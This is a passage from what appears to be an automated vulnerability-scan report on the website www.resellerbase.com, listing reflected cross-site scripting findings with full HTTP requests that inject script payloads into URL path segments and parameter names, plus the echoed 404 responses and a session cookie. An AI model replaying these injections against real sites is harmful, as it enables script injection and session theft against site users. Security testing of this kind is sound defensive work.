Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos36a17<script>alert(1)</script>4ea1be5d94/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3680. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 15556<script>alert(1)</script>cbce5bcd764 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images15556<script>alert(1)</script>cbce5bcd764/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images15556<script>alert(1)</script>cbce5bcd764/rating/ was not found on this server.</p>
...[SNIP]...

2.3681. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aee2c<script>alert(1)</script>8cd2c17038c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/ratingaee2c<script>alert(1)</script>8cd2c17038c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/ratingaee2c<script>alert(1)</script>8cd2c17038c/ was not found on this server.</p>
...[SNIP]...

2.3682. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf022<script>alert(1)</script>f358d897753 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/?cf022<script>alert(1)</script>f358d897753=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/?cf022<script>alert(1)</script>f358d897753=1 was not found on this server.</p>
...[SNIP]...

2.3683. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a4af<script>alert(1)</script>c464e4d9e02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a4af<script>alert(1)</script>c464e4d9e02/8/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a4af<script>alert(1)</script>c464e4d9e02/8/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3684. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b9a6<script>alert(1)</script>7dfd74e133c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/84b9a6<script>alert(1)</script>7dfd74e133c/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/84b9a6<script>alert(1)</script>7dfd74e133c/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3685. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 222c5<script>alert(1)</script>c86fa0c1eaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes222c5<script>alert(1)</script>c86fa0c1eaf/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes222c5<script>alert(1)</script>c86fa0c1eaf/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3686. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2ffc<script>alert(1)</script>43cb06f5543 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb2ffc<script>alert(1)</script>43cb06f5543/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb2ffc<script>alert(1)</script>43cb06f5543/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3687. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9623e<script>alert(1)</script>fb273ecd471 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images9623e<script>alert(1)</script>fb273ecd471/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images9623e<script>alert(1)</script>fb273ecd471/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3688. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2655<script>alert(1)</script>118c123c155 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/ratingb2655<script>alert(1)</script>118c123c155/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/ratingb2655<script>alert(1)</script>118c123c155/0.gif was not found on this server.</p>
...[SNIP]...

2.3689. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc25a<script>alert(1)</script>6e8ab6e8ee3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/0.gifcc25a<script>alert(1)</script>6e8ab6e8ee3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/0.gifcc25a<script>alert(1)</script>6e8ab6e8ee3 was not found on this server.</p>
...[SNIP]...

2.3690. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 921dc<script>alert(1)</script>3fab0dacefa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/0.gif?921dc<script>alert(1)</script>3fab0dacefa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/0.gif?921dc<script>alert(1)</script>3fab0dacefa=1 was not found on this server.</p>
...[SNIP]...

2.3691. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8ce0<script>alert(1)</script>416fe3540af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8ce0<script>alert(1)</script>416fe3540af/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8ce0<script>alert(1)</script>416fe3540af/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3692. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc226<script>alert(1)</script>5c3c8f1c0dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8fc226<script>alert(1)</script>5c3c8f1c0dc/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8fc226<script>alert(1)</script>5c3c8f1c0dc/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3693. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12fd4<script>alert(1)</script>dfa38cc7b52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes12fd4<script>alert(1)</script>dfa38cc7b52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes12fd4<script>alert(1)</script>dfa38cc7b52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3694. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b533f<script>alert(1)</script>fde8bb3f327 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb533f<script>alert(1)</script>fde8bb3f327/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb533f<script>alert(1)</script>fde8bb3f327/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3695. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faade<script>alert(1)</script>a85c05c0cc7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/imagesfaade<script>alert(1)</script>a85c05c0cc7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/imagesfaade<script>alert(1)</script>a85c05c0cc7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3696. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8a6f6<script>alert(1)</script>d5673cf7cba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating8a6f6<script>alert(1)</script>d5673cf7cba/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating8a6f6<script>alert(1)</script>d5673cf7cba/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3697. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 98861<script>alert(1)</script>7d290f323c7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/search.php98861<script>alert(1)</script>7d290f323c7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php98861<script>alert(1)</script>7d290f323c7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3698. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3f4db<a>3e7e2eb2ed0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

